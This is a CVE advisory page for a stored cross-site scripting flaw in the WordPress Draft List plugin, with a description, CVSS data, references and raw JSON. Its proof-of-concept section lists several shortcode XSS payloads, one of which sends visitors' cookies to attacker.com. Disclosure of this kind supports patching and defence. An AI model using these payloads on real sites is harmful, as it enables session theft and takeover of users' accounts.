Security Vulnerability Report
CVE-2025-11197 CVSS 6.4 MEDIUM

Published: 2025-10-11 08:15:32
Last Modified: 2026-04-15 00:35:42

Description

The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'drafts' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Draft List plugin (simple-draft-list), all versions <= 2.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
PoC for CVE-2025-11197 - Stored XSS in WordPress Draft List Plugin
The following shortcode payload can be injected by an authenticated contributor
to execute arbitrary JavaScript when any user visits the affected page.
-->

<!-- Step 1: Create a new post/page as a contributor-level user -->
<!-- Step 2: Insert the following shortcode in the content editor -->
[drafts title=""><script>alert('XSS-CVE-2025-11197-'+document.cookie)</script><div data-x=""]

<!-- Alternative payloads for different contexts -->

<!-- Payload 2: Event handler injection -->
[drafts title="test" onmouseover="alert(1)" data-x=""]

<!-- Payload 3: Image tag with onerror -->
[drafts title="<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>"]

<!-- Payload 4: SVG-based XSS -->
[drafts title="<svg onload=alert(document.domain)>"]

<!--
Expected behavior:
- The malicious script is stored in the WordPress database as part of the post content.
- When any user (including administrators) views the post/page, the injected JavaScript executes in their browser context.
- This can lead to session hijacking, cookie theft, privilege escalation, or arbitrary actions performed on behalf of the victim.
-->

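References

https://github.com/dartiss/draft-list/pull/81/files
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3376385%40simple-draft-list&new=3376385%40simple-draft-list&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/4711e3d5-b70c-413e-97e7-6d2e93e8217e?source=cve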

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11197", "sourceIdentifier": "[email protected]", "published": "2025-10-11T08:15:31.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'drafts' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/dartiss/draft-list/pull/81/files", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3376385%40simple-draft-list&new=3376385%40simple-draft-list&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4711e3d5-b70c-413e-97e7-6d2e93e8217e?source=cve", "source": "[email protected]"}]}}